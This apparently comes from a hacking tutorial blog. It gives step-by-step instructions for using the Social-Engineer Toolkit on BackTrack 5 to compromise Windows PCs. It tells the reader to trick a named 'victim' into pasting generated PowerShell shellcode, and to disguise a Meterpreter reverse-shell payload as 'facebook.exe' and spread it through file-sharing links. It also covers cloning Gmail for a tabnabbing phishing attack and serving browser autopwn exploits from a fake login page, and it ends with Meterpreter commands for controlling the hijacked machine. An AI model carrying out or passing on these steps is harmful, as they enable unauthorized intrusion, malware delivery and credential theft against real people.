Hack Windows7 PC using Powershell Attack Vector in Social Engineering Toolkit (Bypassing Antivirus)

The Powershell Attack Vector module allows you to create PowerShell specific attacks. These attacks will allow you to use PowerShell which is available by default in all operating systems Windows Vista and above. PowerShell provides a fruitful landscape for deploying payloads and performing functions that do not get triggered by

Preventative Technologies.

  • Powershell Alphanumeric Shellcode Injector
  • Powershell Reverse Shell
  • Powershell Bind Shell
  • Powershell Dump SAM Database

Open your backtrack terminal & Type cd /pentest/exploits/set

Now Open Social Engineering Toolkit (SET). /set

Now choose 1, “Social-Engineering Attacks

Now choose 10, “Powershell Attack Vector

Now choose 1, “Powershell Alphanumeric Shellcode Injector” and type IP address of Your PC for Reverse Connection.

Now create the exploit code for 32 and 64 bit Windows:

Now is retrieve the Powershell code that SET created. The code is saved in /pentest/exploits/set/reports/powershell/x64_powershell_injection.txt

Now send your x64_powershell_injection.txt files to victim via chat or email or any social engineering technique and convene the victim to open x64_powershell_injection.txt and Paste it into a Windows 7 command prompt

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID

Hack Remote PC using Payload in BackTrack 5

Open Your Backtrack terminal and Type cd  /pentest/exploits/set

Now Open Social Engineering Toolkit (SET) ./set

Now choose option 1, “Social-Engineering Attacks

Now choose option 4, “Create Payload and Listener

Now choose 2 “Windows Reverse_TCP Meterpreter”, but you have several to choose from including your own program.

Now choose 2 “shikata-ga-nai

Now choose a port for the listener, choose a random port 443 and then I choose Yes on starting a listener.

Now a file name msf.exe has been created, you can get the file by going on file system–>pentest>exploit–>set–>msf.exe

Now rename the file anything you want. In my case I am renaming it facebook.exe

Now upload your exe on file sharing website like filesonic, rapidshare, and megaupload. In my case I am using 4shared.com now send link to the victim. 

As soon as our victim downloads and executes our facebook.exe, now you have access to the victims PC

Use “Sessions -l” and the Session number to connect to the session.  Now Type “session s -i ID“.

How to Hack Gmail, Facebook with Backtrack 5

First open your backtrack terminal and type ifconfig to check your IP

Now Again Open Your Backtrack terminal and Type cd  /pentest/exploits/set

Now Open Social Engineering Toolkit (SET) ./set

Now choose option 2, “Website Attack Vectors”.

In this option we will select option 4 “Tabnabbing Attack Method”.

In this option we will choose option 2 “Site Cloner”.

Enter the URL of the site you want to clone. In this case //www.gmail.com and hit enter. SET will clone up the web site. And press return to continue.

Now convert your URL into Google URL using goo.gl and send this link address to your victim via Email or Chat.

When victim open in their browser it should be a message that the page is still loading. so victim start to open another tab. As soon as victim open new tab, our fake website start working. That script will redirect the victim to the phishing page your derived.

How to Hack Windows XP in LAN using Backtrack 5

The Social-Engineer Toolkit (SET) is specifically designed to perform advanced attacks against the human element. SET was written by David Kennedy (ReL1K) and with a lot of help from the community it has incorporated attacks never before seen in an exploitation toolset. The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization used during a penetration test.

Requirements

  • Backtrack  5
  • Windows XP Machine (Target)

Open Your Backtrack terminal and Type cd  /pentest/exploits/set

Now Open Social Engineering Toolkit (SET) ./set

Now choose 2, “Website Attack Vectors”.

In this option we will choose 2The Metasploit Browser Exploit Method” because we will attack via victim browser.

Now choose 1, “Web Templates” to have SET create a generic webpage to use.

Now choose 2 In this tutorial I will use Gmail, but if you think Facebook or Twitter or Google more better because it’s the most accessed website, just change into what do you want.

Now choose 22Metasploit Browser Autopwn” to load all vulnerability Social Engineering Toolkit known. These tools will launch all exploit in Social Engineering Toolkit database.

Now choose 2Windows Reverse_TCP Meterpreter”, but you have several to choose from including your own program.

Connect back port to attacker computer. In this example I use port 1234, but you can change to 1456, 4521, etc

Now it creates the backdoor program, encodes and packs. It creates the website that you want to use and starts up a listening service looking for people to connect. When done, your screen will look like this:

When the link given to user, the victim will see looks-a-like Gmail (fake website). When the page loads it also load all malicious script to attack victim computer.

In attacker computer if there’s any vulnerability in victim computer browser it will return sessions value that mean the exploit successfully attacking victim computer. In this case the exploit create new fake process named “Notepad.exe

You now have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID

PS

The ‘ps‘ command displays a list of running processes on the target.

 ls

As in Linux, the ‘ls‘ command will list the files in the current remote directory.

Shell

The ‘shell‘ command will present you with a standard shell on the target system.

meterpreter>help The ‘help’ command, as may be expected, displays the Meterpreter help menu.
meterpreter>sysinfo To Get System Information
meterpreter>background The ‘background’ command will send the current Meterpreter session to the background and return you to the msf prompt
meterpreter>migrate you can migrate to another process on the victim
meterpreter>download The ‘download’ command downloads a file from the remote machine
meterpreter>getuid Running ‘getuid’ will display the user that the Meterpreter server is running as on the host.